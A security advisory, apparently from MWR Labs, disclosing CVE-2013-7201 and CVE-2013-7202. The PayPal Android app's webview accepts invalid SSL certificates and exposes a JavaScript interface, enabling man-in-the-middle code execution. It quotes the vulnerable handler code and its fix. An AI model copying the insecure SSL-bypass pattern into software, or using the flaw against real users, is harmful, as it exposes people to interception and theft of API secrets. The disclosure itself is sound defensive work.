Paypal Remote Code Execution

CVE-2013-7201, CVE-2013-7202

    Type

  • Paypal Remote Code Execution

    • Severity

  • High

    • Affected products

  • Paypal Android Application

    • Affected Versions

  • Paypal<=5.3 & Android <4.2

    • Vendor

  • Paypal

    • Vendor Response

  • Vendor Response

    • Authors

  • Henry Hoggard, MWR Labs

    • CVE Reference

  • SSL Bypass: CVE-2013-7201 Remote Code Execution: CVE-2013-7202
Read more
Timeline
2013-12-23Sent initials details of bug
2013-12-23Paypal acknowledges bugs, pointing out that SSL issues are out of scope in their bug bounty
2013-12-29Paypal request video PoC
2013-12-29PoC video provided
2014-02-25Paypal claim no risk to Paypal brand

A vulnerability was discovered on the Paypal Application for Android, the vulnerability allows an attacker to gain code execution via a man in the middle attack.

Description

PayPal for Android allows users to send and receive money on Android, it contains similar features of the web based PayPal application. The PayPal Android app is vulnerable to remote code execution via man in the middle attacks.

Impact

Remote code and command execution in the context of the application. The API secrets needed to interact with PayPal’s API are stored in cleartext in the shared preferences file. These could be stolen using this exploit and then used to call methods from the PayPal API.

Cause

PayPal uses a webview that ignores SSL certificates, the same webview has a Javascript Interface implemented. The combination of the two bugs allows attackers to man in the middle connections to execute code on the device.

Interim Workaround

Do not use the Paypal android app on public Wi-Fi networks. Update your device to Android 4.2 or later if possible.

Solution

Changing from proceed() to cancel() will stop the webview accepting invalid SSL certificates. This will prevent attackers MITM the webview and injecting malicious code.

Public void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler,
SslError paramSslError)
{
paramSslErrorHandler.cancel();
}
}

Technical Details

SSL Bypass

The class WebHybridClient.java implements a webview. If it hits an SSL error, it will continue with the request, rather than displaying an error or killing the connection. This means an attacker can MITM HTTPS requests through this webview.

public void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler,
SslError paramSslError)
{
paramSslErrorHandler.proceed();
}
}

Vulnerable Classes

  • com/paypal/android/choreographer/flows/help/WebHybridClient.java
  • com/paypal/android/choreographer/flows/shop/fragments/EnhancedCheckinHybridFragment.java
  • com/paypal/android/choreographer/web/WebHybridClient.java

Javascript Code Execution

The WebHybridClient class contains a method that uses a Javascript Interface. This allows an attacker to execute code on the device in the context of the PayPal application in android 4.1 and below.

public View onCreateView(LayoutInflater paramLayoutInflater, ViewGroup paramViewGroup,
Bundle paramBundle)
{
...
this.web.getSettings().setJavaScriptEnabled(true);
...
this.web.addJavascriptInterface(this.mListener, "ppAndroid");
...
return localView;
}

It was recently discovered that applications do not even need to have a Javascript Interface in their code to be vulnerable to this attack. This is because a Javascript Interface is implemented core webview code in Android versions before 4.2. Meaning that every single application that loads a webview over cleartext is vulnerable to this attack.